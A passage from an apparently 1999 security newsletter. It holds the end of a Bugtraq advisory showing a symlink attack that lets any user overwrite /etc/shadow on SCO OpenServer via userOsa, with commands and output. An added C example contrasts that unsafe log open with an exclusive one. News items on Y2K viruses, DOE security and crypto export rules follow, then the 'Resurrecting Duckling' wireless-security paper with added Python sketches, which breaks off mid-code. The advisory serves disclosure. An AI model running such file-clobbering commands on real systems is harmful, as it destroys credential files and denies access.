      SendConnectFail(connectFail
      {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ
      {Invalid Connect Request: bah}}})
     
      scohack:/#
      
      credit
      This vulnerability was posted to the Bugtraq mailing list
      by "Brock Tellier" <btellier@webley.com> on Mon, 11
      Oct 1999.

      reference
       
       message:
               SCO OpenServer 5.0.5 overwrite /etc/shadow
               (Brock Tellier <btellier@webley.com>)
               http://www.securityfocus.com/templates/archive.pike?list=1&msg=02e601bf1426$b1043920$3177a8c0@webley
               
       web page:
               Patches and Supplements from SCO
               (SCO)
               http://www.sco.com/support/ftplists/index.html
               
               
       web page:
               SCO Secure Technologies Group
               (SCO)
               http://www.sco.com/security/
               
      
      
       To: BugTraq
       Subject: SCO OpenServer 5.0.5 overwrite /etc/shadow
       Date: Mon Oct 11 1999 02:24:59
       Author: Brock Tellier
       Message-ID: <02e601bf1426$b1043920$3177a8c0@webley>
      
      
      Greetings,
      
      Any user may overwrite any file with group auth (i.e. /etc/shadow,
      /etc/passwd) using /etc/sysadm.d/bin/userOsa.  Note that this will not
      change the permissions of the file or allow for the user to input a
      passwd entry string into these files, it will simply clobber the contents
      of the file with debug output.
      
      When userOsa receives invalid input, it generates a log file called
      "debug.log" in the PWD.  This file is created with group auth
      permissions, does not check for this file's existence, and will follow
      symlinks. Thus the exploit is as follows:
      
      
      scohack:/tmp$ ln -s /etc/shadow.old debug.log
      scohack:/tmp$ /etc/sysadm.d/bin/userOsa
      bah
      connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect
      Request: bah}}}
      Failed to listen to client
      Failure in making connection to OSA.
      scohack:/tmp$
      
      -----
      
      BEFORE EXPLOIT:
      scohack:/# l /etc/shadow.old
      -rw-rw----   1 root     auth          26 Oct 11 20:08 /etc/shadow.old
      
      AFTER EXPLOIT (note the file size):
      scohack:/# l /etc/shadow.old
      -rw-rw----   1 root     auth         177 Oct 11 20:10 /etc/shadow.old
      
      scohack:/# cat /etc/shadow.old
      >>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <PID=11604>
      <<<
      SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ
      {Invalid Connect Request: bah}}})
      
      scohack:/#
      
      Brock Tellier
      UNIX Systems Administrator
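
      An added example, not SCO's code or patch: the log-open behaviour
      described above next to an exclusive open that refuses a pre-planted
      debug.log. It runs entirely inside a scratch directory under /tmp; the
      function names, the stand-in target file and the debug line are
      constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define ORIGINAL   "stand-in account database\n"   /* 26 bytes, constructed */
#define DEBUG_LINE ">>> Debug log opened (constructed sample line)\n"

/* "Before": create or truncate, following whatever is at the path. This
 * is the behaviour the advisory describes for debug.log. */
int open_log_unchecked(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0660);
}

/* "After": succeed only if this call creates the file. With O_CREAT,
 * O_EXCL makes open() fail when the path already exists, including when
 * it is a symlink; O_NOFOLLOW also refuses a symlink as the last
 * path component. */
int open_log_exclusive(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

static int write_all(int fd, const char *s)
{
    size_t left = strlen(s);

    while (left > 0) {
        ssize_t n = write(fd, s, left);
        if (n <= 0)
            return -1;
        s += n;
        left -= (size_t)n;
    }
    return 0;
}

/* Build a scratch directory holding a stand-in target file and a
 * "debug.log" symlink pointing at it, write one debug line through the
 * given opener, and return the target's size afterwards (-1 if the
 * setup failed). */
long target_size_after(int (*opener)(const char *))
{
    char dir[] = "/tmp/logdemoXXXXXX";
    char target[64], logpath[64];
    struct stat st;
    long size = -1;
    int fd, ok;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(target, sizeof(target), "%s/target", dir);
    snprintf(logpath, sizeof(logpath), "%s/debug.log", dir);

    fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0660);
    ok = (fd >= 0 && write_all(fd, ORIGINAL) == 0);
    if (fd >= 0)
        close(fd);

    if (ok && symlink(target, logpath) == 0) {
        fd = opener(logpath);               /* the step under test */
        if (fd >= 0) {
            write_all(fd, DEBUG_LINE);
            close(fd);
        }
        if (stat(target, &st) == 0)
            size = (long)st.st_size;
    }
    unlink(logpath);                        /* removes the link itself */
    unlink(target);
    rmdir(dir);
    return size;
}

int main(void)
{
    printf("target size after unchecked open: %ld\n",
           target_size_after(open_log_unchecked));
    printf("target size after exclusive open: %ld\n",
           target_size_after(open_log_exclusive));
    return 0;
}
```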
      
      @HWA         
      
79.0  ARE VIRUSES Y2K COMPLIANT?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by Thejian, Thursday 21st October 1999 on 11:30 am CET
      As if there isn't enough uncertainty about Y2K, computer virus experts advise extra
      care to inoculate before the century turns, lest a virus take advantage of Y2K chaos.
      Their concern? Not only viruses targeting y2k, but also the new year awakening
      dormant old viruses. A millennium virus may go unnoticed in the Y2K confusion. A
      virus set to activate as the calendar rolls over might cause damage that people will
      blame on Y2K, which would allow the virus to spread more quickly, say some
      experts. 
      

      Are Viruses Y2K Compliant?

      Be ready: Virus authors may target Y2K, or the
      new year may awaken dormant old viruses.

      by Charles Bermant, special to PC World 
      October 20, 1999, 6:30 p.m. PT 

      As if there isn't enough uncertainty about Y2K,
      computer virus experts advise extra care to inoculate
      before the century turns, lest a virus take advantage of
      Y2K chaos. 

      Their concern? A millennium virus may go unnoticed in
      the Y2K confusion. A virus set to activate as the
      calendar rolls over might cause damage that people will
      blame on Y2K, which would allow the virus to spread
      more quickly, say some experts. 

      On the other hand, virus authors are an egotistical
      bunch who may not want to share their 15 minutes of
      fame with another media event like the new millennium.


      Virus Opportunity

      "We expect there will be some kind of virus attack,"
      says Sal Viveros, Network Associates group marketing
      manager for the Total Virus Defense Product, which
      includes McAfee VirusScan. "When systems fail,
      administrators might not think of a virus and head off on
      a wild goose chase in order to solve the problem." 

      Network Associates has already found six viruses
      keyed to Y2K, Viveros says. He expects many more
      are set to deliver their payload either January 1 or on
      January 3, when people return to work. 

      Antivirus vendor Panda Software sounded the alarm
      early. Its Web site warns that many viruses rely on
      date stamps to operate, and it's uncertain how they'll
      behave in 2000. 

      "Y2K has an unpredictable effect, and you can't just
      leave it to chance," says Pedro Bustamante, executive
      director of Panda's U.S. office. "A lot of people have
      outdated virus [protection] programs, and this gives
      them a false sense of security." 

      Like the potential effect of Y2K on banking, power, and
      software, no one can say for sure what viruses will do.
      Perhaps virus authors will take the opportunity to
      create a monumental meanie. 

      "There might be a few new viruses written that the
      author hopes will not be noticed in the general
      background noise of champagne corks popping," says
      Ross M. Greenberg, an author of early antivirus
      products and former manager of MSN's Computing
      Central's Safe Computing Forum. "But, generally, a
      virus author wants their little creation to be noticed.
      There would be no delight in their creation's damage
      not being credited to whatever name they hide behind if
      Y2K took the credit for it." 

      Viveros disagrees, saying that Y2K is the ultimate
      challenge for a virus author. 

      "What better time to unleash a virus than when
      everyone is watching?" Viveros asks. 
            
      @HWA
      
80.0  COMPUTER SECURITY AT CENTER OF DOE PROBLEMS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by Thejian, Thursday 21st October 1999 on 11:00 am CET
      The former director of the Energy Department's Office of Safeguards and Security
      today outlined for Congress years of cybersecurity problems at the nation's nuclear
      weapons laboratories, claiming officials were aware of ongoing espionage but failed to
      do anything about it. "A variety of computer security tools and techniques, such as
      encryption devices, firewalls and disconnect features, are required by policy; however,
      these policies were frequently ignored." Federal Computer Week. 
      
      OCTOBER 20, 1999 . . . 18:06 EDT 


      Computer security at center of DOE problems,
      top officials say
 
      BY DANIEL VERTON (dan_verton@fcw.com)
 
      The former director of the Energy Department's Office of Safeguards and
      Security today outlined for Congress years of cybersecurity problems at the
      nation's nuclear weapons laboratories, claiming officials were aware of
      ongoing espionage but failed to do anything about it.
 
      Edward McCallum, the former chief of DOE security who is now detailed to
      the Defense Department as the Pentagon's acting director of the Combating
      Terrorism Technology Support Office, said DOE officials "knew our greatest
      secrets were being stolen and . . . did nothing about it."
 
      McCallum, who testified today before the House Armed Services
      Committee's Military Procurement Subcommittee, said efforts by his office
      dating to 1995 to enhance DOE cybersecurity met with "significant laboratory
      resistance" and ultimately failed. "Several laboratories and their program
      assistant secretaries in Washington, [D.C.], believed that protection, such as
      firewalls and passwords, was unnecessarily expensive and a hindrance to
      science," McCallum said. "A variety of computer security tools and
      techniques, such as encryption devices, firewalls and disconnect features, are
      required by policy; however, these policies were frequently ignored."
 
      Retired Air Force Gen. Eugene Habiger, director of DOE's Office of Security
      and Emergency Operations, told committee members that during his review of
      DOE security measures, under way since he took the post in June, he
      discovered that the department had lost its focus on security. "By-products of
      this organizational dysfunction and lack of focus included . . . a lack of
      attention to our cybersecurity practices in a world of increased computer
      hacking and cyberterrorism," said Habiger.
 
      McCallum identified the lack of protection afforded classified information
      systems and the ease with which that information could be transferred to and
      from classified systems as one of the DOE's primary security weaknesses.
      "Something as simple as using different size floppy disks between classified
      and unclassified systems was rejected as unnecessary," he said. "Indeed, I
      believe we are sitting at the center of the worst spy scandal in our nation's
      history."
 
      Habiger also laid blame on Congress' failure to fund additional cybersecurity
      initiatives requested by DOE in the department's fiscal 2000 budget proposal.
      "We have valid requirements in the area of cybersecurity to buy hardware,
      encryption equipment and to train our system administrators," Habiger said.
      However, "simply stated, we have been given a mandate but not the additional
      resources to accomplish that mandate."
     
     @HWA
     
81.0  US REVISITS SOURCE CODE LIMITS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by Thejian, Wednesday 20th October 1999 on 11:50 pm CET
      The Clinton administration is considering relaxing export limits on computer source
      code for data scrambling programs, in a possible move acknowledging the growing
      importance of Linux, a top export official said Tuesday. Undersecretary of Commerce
      William Reinsch said the administration had originally intended to maintain current
      export limits on source code, or instructions written by a computer programmer that
      can be compiled into a computer program. Following announcements by the White
      House on the relaxation of pre-compiled crypto, the restrictions on source code are
      under review now too. Wired. 
      
      US Revisits Source Code Limits
      Reuters

      3:00 a.m. 20.Oct.99.PDT
      The Clinton administration is considering relaxing export limits on computer source
      code for data scrambling programs, in a possible move acknowledging the growing
      importance of Linux, a top export official said Tuesday. 

      Undersecretary of Commerce William Reinsch said the administration had
      originally intended to maintain current export limits on source code, or
      instructions written by a computer programmer that can be compiled into a
      computer program.

      But after the administration announced it would significantly relax many of its limits
      on already compiled computer encryption programs, high-tech companies
      complained that retaining the source code limit was unworkable, Reinsch said in
      a telephone interview. 

      "We are now reviewing that," Reinsch said. "It's on the table as [an] area where
      we might make a revision." 

      Revised encryption export rules will be released by 15 December, he said, with
      any possible changes for source code export likely included at that time. 

      Encryption, which uses mathematical formulas to scramble information and
      protect it from prying eyes, is now included in everything from Web browsers
      and email programs to cable television set-top boxes and handheld computers. 

      Traditionally, software companies sold finished programs but kept the source
      code underlying their programs a tightly guarded secret. Microsoft, for example,
      has never published the source code underlying its Windows operating system. 

      More recently, a movement of "open source" software has gained momentum,
      including a version of the Unix operating system developed by Linus Torvalds and
      known as Linux. 
      
      Source code of such programs is made freely available to anyone, usually over
      the Internet. 

      But the export rules consider posting source code on the Internet, where
      people in other countries can download it, a form of export. That creates problems
      for US programmers that want to include encryption features for Linux or other
      "open source" programs. 

      A three-judge panel of the Ninth US Court of Appeals ruled in May that the source
      code export limits were a violation of the First Amendment's free speech
      guarantee, but the decision is being reviewed by the full appeals court. 

      Computer science professor Daniel Bernstein filed the lawsuit so he could
      post an encryption program he had written on the Internet. 

      A change in the export rules could render
      the case moot. 

      Copyright 1999 Reuters Limited. 
      
      @HWA
     
82.0  SECURITY FOR AD-HOC WIRELESS NETWORKS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by Thejian, Wednesday 20th October 1999 on 11:30 pm CET
      The Resurrecting Duckling is a security policy model which describes secure
      transient association of a device with multiple serialised owners. Basically a nice
      description on some of the security issues in wireless networks and ways to battle
      those. Cambridge paper. 
      
      The Resurrecting Duckling:
      Security Issues for Ad-hoc Wireless Networks

      Frank Stajano and Ross Anderson 

      In the near future, many personal electronic devices will be able to communicate
      with each other over a short range wireless channel. We investigate the principal
      security issues for such an environment. Our discussion is based on the concrete 
      example of a thermometer that makes its readings available to other nodes over 
      the air. Some lessons learned from this example appear to be quite general to 
      ad-hoc networks, and rather different from what we have come to expect in more
      conventional systems: denial of service, the goals of authentication, and the 
      problems of naming all need re-examination. We present the resurrecting duckling
      security policy model, which describes secure transient association of a device 
      with multiple serialised owners. 

      This research was first presented at the 7th International Workshop on Security
      Protocols, held in Cambridge, UK, from 1999-04-19 to 1999-04-21. The proceedings
      will be published by Springer-Verlag in the Lecture Notes for Computer Science 
      series. The full text of the paper is available as PDF (114 KB), gzipped PostScript
      (127 KB) or HTML (35 KB). 

      A few months later, an abridged and updated version was presented at the 3rd AT&T
      Software Symposium, held in Middletown, NJ, USA, on 1999-10-20. The text of this 
      version is available as PDF (70 KB) or gzipped PostScript (104 KB). 
      
      http://www.cl.cam.ac.uk/~fms27/papers/duckling.pdf
      http://www.cl.cam.ac.uk/~fms27/papers/duckling.ps.gz
      http://www.cl.cam.ac.uk/~fms27/duckling/duckling.html
      http://www.cl.cam.ac.uk/~fms27/papers/duckling-attss99.pdf
      http://www.cl.cam.ac.uk/~fms27/papers/duckling-attss99.ps.gz
      
      The Resurrecting Duckling: 
      Security Issues for Ad-hoc Wireless Networks
      
      Frank Stajano (1,2) and Ross Anderson (1)
      
      (1) 
      University of Cambridge Computer Laboratory,
      New Museums Site, Pembroke Street, Cambridge CB2 3QG, UK
      name.surname@cl.cam.ac.uk
      
      (2)
      AT&T Laboratories Cambridge,
      24a Trumpington Street, Cambridge CB2 1QA, UK
      fstajano@uk.research.att.com 
      
      Abstract
      
      In the near future, many personal electronic devices will be able to communicate with each other over a short range wireless channel. We investigate the principal security issues for such an environment. Our discussion is based on the concrete example of a
      thermometer that makes its readings available to other nodes over the air. Some lessons learned from this example appear to be quite general to ad-hoc networks, and rather different from what we have come to expect in more conventional systems: denial of
      service, the goals of authentication, and the problems of naming all need re-examination. We present the resurrecting duckling security policy model, which describes secure transient association of a device with multiple serialised owners. 
      
      
      
      Introduction
      
      The established trend in consumer electronics is to embed a microprocessor in everything - cellphones, car stereos, televisions, VCRs, watches, GPS (Global Positioning System) receivers, digital cameras - to the point that most users have already lost track of the
      number of items they own that contain one. In some specific environments such as avionics, electronic devices are already becoming networked; in others, work is underway. Medical device manufacturers want instruments such as thermometers, heart monitors
      and blood oxygen meters to report to a nursing station; consumer electronics makers are promoting the Firewire standard [firewire] for PCs, stereos, TVs and DVD players to talk to each other; and kitchen appliance vendors envisage a future in which the oven
      will talk to the fridge, which will reorder food over the net. 
      
      We envisage that, in the near future, this networking will become much more general. The next step is to embed a short range wireless transceiver into everything; then many gadgets can become more useful and effective by communicating and cooperating with
      each other. A camera, for example, might obtain the geographical position and exact time from a nearby GPS unit every time a picture is taken, and record that information with the image. At present, if the photographer wants to record a voice note with the
      picture, the camera must incorporate digital audio hardware; in the future, the camera might let him speak into his digital audio recorder or cellphone. Each device, by becoming a network node, may take advantage of the services offered by other nearby devices
      instead of having to duplicate their functionality. 
      
      Ad-hoc Wireless Networks
      
      This vision of embeddable wireless connectivity has been in development for several years at AT&T Laboratories Cambridge in the context of the Piconet [piconet97] project and is also being pursued, although with emphasis on different aspects, by several
      other groups including HomeRF [homerf-www,homerf98], IrDA [irda-www] (which uses infrared instead of radio) and Bluetooth [bluetooth-www,bluetooth98]. 
      
      Everyone - including potential users - knows that wireless networking is more prone to passive eavesdropping attacks. But it would be highly misleading to take this as the only, or even the main, security concern. 
      
      In this paper we investigate the security issues of an environment characterised by the presence of many principals acting as network peers in intermittent contact with each other. To base the discussion on a concrete example we shall consider a wireless
      temperature sensor. Nearby nodes may be authorised to request the current temperature, or to register a "watch" that will cause the thermometer to send out a reading when the temperature enters a specific range. We wish to make our thermometer useful in the
      widest range of environments including environmental monitoring, industrial process control and medicine. 
      
      We will therefore consider how we can enable our thermometer to support all the security properties that might be required, including confidentiality, integrity (and its close relative authenticity) and availability. Contrary to academic tradition, however, we
      shall examine them in the opposite order, as this often (and certainly in our case) reflects their actual importance. First, however, we have to mention some of the resource constraints under which such networks operate. 
      
      System constraints
      
      The three main constraints on Piconet, and on similar systems which support ad-hoc networks of battery operated personal devices, are as follows: 
      
        Peanut CPU: the computing power of the processor in the node is typically small, so large computations are slow. 
      
        Battery power: the total energy available to the node is a scarce resource. The node likes to go to sleep whenever possible. It is not desirable to use idle time to perform large computations in the background. 
      
        High latency: to conserve power, nodes are off most of the time and only turn on their receiver periodically. Communicating with such nodes involves waiting until they next wake up. 
      
      The consequence of those constraints is that, while strong symmetric cryptography is feasible, modular arithmetic is difficult and so is strong asymmetric cryptography. Where a peanut node (e.g. the one embedded in a camera) interacts with a more powerful one
      (e.g. the one embedded in a mobile phone or laptop), one may use techniques such as low exponent RSA, with the protocols designed so that the peanut node sticks to the cheap operations of encryption and verification while avoiding the expensive ones of
      decryption and signature. 
      
      More generally, where there is a trade-off between security and (say) battery life, we may want to let the user control this. For example, if our thermometer is used to drive a wall display in someone's living room that shows the outside temperature, then the
      owner is unlikely to opt for validated and encrypted communication if this means that he must change the battery every month instead of once a year. 
      
      One challenge is to integrate this flexibility in the system without introducing major architectural holes of the sort that would allow the attacker, too, to turn off security at will. 
      
      
      
      Availability
      
      Availability means ensuring that the service offered by the node will be available to its users when expected. In most non-military scenarios, this is the security property of greatest relevance for the user. All else counts little if the device cannot do what it should. 
      
      Radio jamming
      
      In the traditional threat model - derived from the military - an attacker can deny service to the nodes in a given area by jamming the radio frequencies they use. Traditional defences include spread spectrum and frequency hopping, both of which force the attacker to
      jam a wider frequency band and thus use more power. We will revisit them briefly in section * below. However such concerns are of less relevance to the commercial world, where such attacks are dealt with by complaining to the authorities and having the
      operator of the jamming station arrested. 
      
      The novel and interesting service denial threat is different, and concerns battery exhaustion. 
      
      Battery exhaustion
      
      A malicious user may interact with a node in an otherwise legitimate way, but for no other purpose than to consume its battery energy. Battery life is the critical parameter for many portable devices, and many techniques are used to maximise it; in Piconet, for
      example, nodes try to spend most of the time in a sleep mode in which they only listen for radio signals once in a while (the period can be set from a few seconds to several minutes). In this environment, power exhaustion attacks are a real threat, and are much
      more powerful than better known denial of service threats such as CPU exhaustion; once the battery runs out the attacker can stop and walk away, leaving the victim disabled. We call this technique the sleep deprivation torture attack. 
      
      For any public access server, there is necessarily a tension between the contrasting goals of being useful to unknown users and not succumbing to vandals. Whereas some applications can restrict access to known principals, in others (such as web servers and
      name servers) this is infeasible since the very usefulness of the service comes from its being universally available. 
      
      If a server has a primary function (such as sending the outside temperature to the meteorological office every hour) and a distinct auxiliary function (such as sending the current temperature to anyone who requests it) then these functions can be prioritised; a
      reservation mechanism can ensure that the higher priority use receives a guaranteed share of the resource regardless of the number of requests generated by the lower priority uses. (The highest priority use of all may be battery management: if one can estimate
      fairly accurately the amount of usable energy remaining, then the service can be monitored and managed provided that the process does not itself consume too much of the resource it is intended to conserve.) 
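
      A sketch of the reservation mechanism described above, as an added
      example rather than code from the paper or from Piconet. The class
      name, the microjoule unit, the per-period accounting and all the
      numbers are assumptions chosen for the illustration.

```python
PRIMARY = "primary"      # e.g. the hourly report to the meteorological office
AUXILIARY = "auxiliary"  # e.g. answering anyone who asks for the temperature


class EnergyReservation:
    """Per-period energy budget with a share reserved for the primary function."""

    def __init__(self, remaining_uj, periods_left, primary_percent):
        # Battery management first: spread the estimated remaining energy
        # over the periods the node is still expected to survive.
        self.budget = remaining_uj // periods_left
        self.reserved = self.budget * primary_percent // 100
        self.spent = {PRIMARY: 0, AUXILIARY: 0}

    def available(self, kind):
        """Energy this kind of work may still draw in the current period."""
        left = self.budget - self.spent[PRIMARY] - self.spent[AUXILIARY]
        if kind == PRIMARY:
            return left
        # Auxiliary work may not touch what is still reserved for primary use.
        still_reserved = max(0, self.reserved - self.spent[PRIMARY])
        return left - still_reserved

    def admit(self, kind, cost_uj):
        """Charge the request to the budget, or refuse it without serving it."""
        # Receiving and refusing a request still costs some energy; that
        # cost is not modelled here.
        if cost_uj > self.available(kind):
            return False
        self.spent[kind] += cost_uj
        return True

    def new_period(self):
        self.spent = {PRIMARY: 0, AUXILIARY: 0}


def simulate_flood(flood_requests=500, reply_cost_uj=10,
                   report_cost_uj=100, reports_due=4):
    """A burst of auxiliary requests arrives before the primary reports are sent."""
    node = EnergyReservation(remaining_uj=240_000, periods_left=240,
                             primary_percent=40)
    answered = sum(node.admit(AUXILIARY, reply_cost_uj)
                   for _ in range(flood_requests))
    reports = sum(node.admit(PRIMARY, report_cost_uj)
                  for _ in range(reports_due))
    return {
        "budget_uj": node.budget,
        "answered": answered,
        "refused": flood_requests - answered,
        "reports_sent": reports,
        "spent_uj": node.spent[PRIMARY] + node.spent[AUXILIARY],
    }


if __name__ == "__main__":
    print(simulate_flood())
```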
      
      
      
      Authenticity
      
      To whom can a principal talk?
      
      In some applications our thermometer will broadcast its temperature readings, but in general it will only send them to recipients who have been authorised in some way. For example, in a hospital, it might be authorised to send temperature readings to any
      doctor's palmtop computer or any nursing station. But it might also be required to restrict transmission (e.g. of the temperature of a celebrity) to a particular station or device. 
      
      The usual authorisation mechanisms (which turn out to be the least interesting in this case) involve a centralised system administrator. This may be implemented as access control lists (the administrator tells the thermometer who is authorised) or capabilities (the
      administrator gives some principals a signed certificate which they present to the thermometer when they want a reading). However, the ad-hoc network environment poses a fundamental new problem: the absence of an online server. 
      
      Interactions with the administrator after the thermometer has been manufactured (or personalised by the institution that owns it) may be expensive or time-consuming, as they may entail establishing a network connection to a central server (perhaps using
      gossiping via intermediate nodes), or bringing a management device physically close to each affected node. In the particular case of a thermometer, the device might be calibrated every six months, at which time new security state can be loaded; however, rapid
      changes may be too expensive for a central administrator to make regularly. 
      
      It follows that the length of any validity period (whether for certificates or access control lists) will be a trade-off between timeliness and convenience. But relying on expiration dates imposes on the nodes the extra cost of running a secure clock - otherwise the
      holder of an expired certificate might reset a node's clock to a time within the validity period. As many Piconet nodes would not normally have an onboard clock, the classical approach to authentication is suspect. Thankfully, there is a better way. 
      
      Secure transient association
      
      The novel and interesting authentication problem in ad-hoc networks of wireless devices is that of secure transient association. If a householder owns a device, say a universal remote control, that lets her control various other devices in her home (such as hi-fi
      and television components, the heating system, lights, curtains and even the locks and burglar alarm) then she will need to ensure that a new device she buys from the shop will obey her commands, and not her neighbour's. She will want to be assured that a
      burglar cannot take over the heat sensing floodlight in the garden, or unlock the back door, just by sending it a command from a remote control bought in the same shop. 
      
      As well as being secure (whatever that means), the association between the controller and the peripheral must also be transient. When a householder resells or gives away her television set or hi-fi or fridge, it will have to obey another controller; when her
      controller breaks down (or she decides to replace it or upgrade its operating system), she must be able to regain control of all the gadgets she already owns. 
      
      A central authentication service is possible for expensive consumer durables; most governments run such services for houses and cars. But there is no prospect that this will be extended to all durable consumer goods; the UK government abandoned dog
      licensing some years ago as uneconomic. In any case, there would be very grave civil liberties objections to the government maintaining lists of all PCs, hi-fis and DVD players in the country; the outcry over the Pentium III processor ID indicates the likely level of
      political resistance. Even the existing central services stop short of managing keys; the replacement of car keys is left to the motor trade, while house locks are completely uncontrolled. So it is desirable that key management be performed locally: the last thing we
      want is to impose an expensive and unpopular central solution. Yet it would be nice if we could still provide some means of making a stolen DVD player harder to resell. 
      
      Another insight comes from scenarios where we have a pool of identical devices, such as a bowl of disinfectant containing ten thermometers. The doctor does not really care which thermometer she gets when she picks one up, but she does care that the one her
      palmtop talks to is the same one she is holding and not any other one in the bowl or nearby in the ward. 
      
      Many more potential applications of wireless devices require establishing a secure transient association between two principals (typically, but not necessarily, a user and a peripheral). For example, there has been significant interest in the possibility of a police
      pistol that can only fire when held by the officer to whom it was issued, who for this purpose might be wearing a very short range radio ring: at present, in the USA, a large number of the firearm injuries sustained by policemen come from stolen police guns.
      Similar considerations might apply to more substantial weapon systems, such as artillery, that might fall into enemy hands. 
      
      The "resurrecting duckling" security policy
      
      A metaphor inspired by biology will help us describe the behaviour of a device that properly implements secure transient association. 
      
      As Konrad Lorenz beautifully narrates [Lorenz], a duckling emerging from its egg will recognise as its mother the first moving object it sees that makes a sound, regardless of what it looks like: this phenomenon is called imprinting. Similarly, our device (whose
      egg is the shrink-wrapped box that encloses it as it comes out of the factory) will recognise as its owner the first entity that sends it a secret key. As soon as this 'ignition key' is received, the device is no longer a newborn and will stay faithful to its owner for the
      rest of its life. If several entities are present at the device's birth, then the first one that sends it a key becomes the owner: to use another biological metaphor, only the first sperm gets to fertilise the egg. 
      
      We can view the hardware of the device as the body, and the software (particularly the state) as the soul. As long as the soul stays in the body, the duckling remains alive and bound to the same mother to which it was imprinted. But this bond is broken by death:
      thereupon, the soul dissolves and the body returns in its pre-birth state, with the resurrecting duckling ready for another imprinting that will start a new life with another soul. Death is the only event that returns a live device to the pre-birth state in which it will
      accept an imprinting. We call this process reverse metempsychosis. Metempsychosis refers to the transmigration of souls as proposed in a number of religions; our policy is the reverse of this as, rather than a single soul inhabiting a succession of bodies, we
      have a single body inhabited by a succession of souls [Note: Prior art on this technique includes Larry Niven's science fiction novel A World Out of Time (1977) in which convicted criminals have their personalities "wiped" and their bodies recycled.]. 
      
      With some devices, death can be designed to follow an identifiable transaction: our medical thermometer can be designed to die (and lose its memory of the previous key and patient) when returned to the bowl of disinfectant. With others, we can arrange a
      simple timeout, so that the duckling dies of old age. With other devices (and particularly those liable to be stolen) we will arrange that the duckling will only die when so instructed by its mother: thus only the currently authorised user may transfer control of the
      device. In order to enforce this, some level of tamper resistance will be required: assassinating the duckling without damaging its body should be made suitably difficult and expensive. 
      
      In some applications we may need to be able to recover from circumstances in which the legitimate user loses the shared secret (e.g. the password is forgotten or the remote control is broken beyond repair). To be able to regain control of the duckling, one
      should allow for escrowed seppuku: someone other than the mother, such as the manufacturer, holds the role of Shogun with a master password that can command the device to commit suicide. 
      
      In other applications, only part of the duckling's soul should perish. In fact, our thermometer will typically be calibrated every six months by the hospital's (or manufacturer's) technician, and the calibration information must not be erased along with the patient data
      and user key when the device is disinfected, but only when it is plugged into a calibration station. So we may consider the device to be endowed with two souls - the calibration state and the user state - and a rule that the latter may not influence the former. So our
      resurrecting duckling security policy may be combined with multilevel security concepts (in fact, "multilevel secure souls" are a neat application of the Biba integrity policy model [Biba1975]). 
      
      Imprinting
      
      During the imprinting phase, as we said, a shared secret is established between the duckling and the mother. Again, we might think that this is easy to do. If at least one of the two principals involved can perform the expensive public key operations (decrypt and
      sign), the other device then simply generates a random secret and encrypts it under the public key of the powerful device from which it gets back a signed confirmation. 
      
      But many of our nodes lack the ability to do public key, and even if they did it would still not help much. Suppose that a doctor picks up a thermometer and tries to get his palmtop to do a Diffie-Hellman key exchange with it over the air. How can he be sure that
      the key has been established with the right thermometer? If both devices have screens, then a hash of the key might be displayed and verified manually; but this is bad engineering as it is both tedious and error-prone, and in an environment where we want neither.
      We are not likely to want to give a screen to every device; after all, sharing peripherals is one of the goals of ad-hoc networking. 
      
      In many applications, there will only be one satisfactory solution, and we advocate its use generally as it is effective, cheap and simple: physical contact. When the device is in the pre-birth state, simply touching it with an electrical contact that transfers the bits of
      a shared secret constitutes the imprinting. No cryptography is involved, since the secret is transmitted in plaintext, and there is no ambiguity about which two entities are involved in the binding. 
      
      Note that an imprinted duckling may still interact with principals other than its mother; it just cannot be controlled by them. In our medical application, we would usually want the thermometer to report the patient's temperature to any device in the ward which
      asked for it. Only in exceptional circumstances (such as a celebrity patient, or a patient with a socially stigmatised condition) would the patient require encrypted communications to a single doctor's PDA. So should we also have an option of imprinting the device
      with a cleartext access control list (and perhaps the patient's name), rather than an ignition key? 
      
      This brings us back to the issue raised at the end of section *, namely how we might enable a single device to support security mechanisms of differing strength. The solution that we favour is to always bootstrap by establishing a shared secret and to use strong
      cryptography to download more specific policies into the node. The mother can always send the duckling an access control list or whatever in a message protected by the shared secret. Having a key in place means that the mother can change its mind later; so if
      the patient is diagnosed HIV positive and requests secure handling of his data from then on, the doctor does not have to kill and reinitialise all the equipment at his bedside. In general, it appears sound policy to delegate from a position of strength. 
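
      The life cycle described in this section and the preceding one (imprinting by contact, policy download under the shared secret, death, escrowed seppuku, and a calibration soul that survives death) can be sketched as a small state machine. This is an added example, not code from the paper; the verb names, the counter-based replay protection and the use of HMAC-SHA256 are assumptions.

```python
import hashlib
import hmac

def encode(counter: int, verb: str, arg: str) -> bytes:
    """Length-prefixed encoding so that field boundaries are unambiguous."""
    fields = [str(counter).encode(), verb.encode(), arg.encode()]
    return b"".join(len(f).to_bytes(2, "big") + f for f in fields)

def seal(key: bytes, counter: int, verb: str, arg: str = "") -> tuple:
    """What a controller sends: the command fields plus a MAC under its key."""
    tag = hmac.new(key, encode(counter, verb, arg), hashlib.sha256).digest()
    return counter, verb, arg, tag

class Duckling:
    """A thermometer-like node. Verbs and counters are illustrative assumptions."""

    def __init__(self, shogun_key: bytes):
        self._shogun_key = shogun_key  # escrowed master secret (e.g. manufacturer)
        self._shogun_ctr = 0           # survives death: old seppuku orders cannot be replayed
        self._key = None               # ignition key; None means imprintable (pre-birth)
        self._ctr = 0                  # highest counter accepted from the current mother
        self.user_soul = {}            # ACL and patient data: dies with the key
        self.calibration_soul = {}     # higher-integrity state: survives death

    @property
    def imprintable(self) -> bool:
        return self._key is None

    def touch(self, secret: bytes) -> bool:
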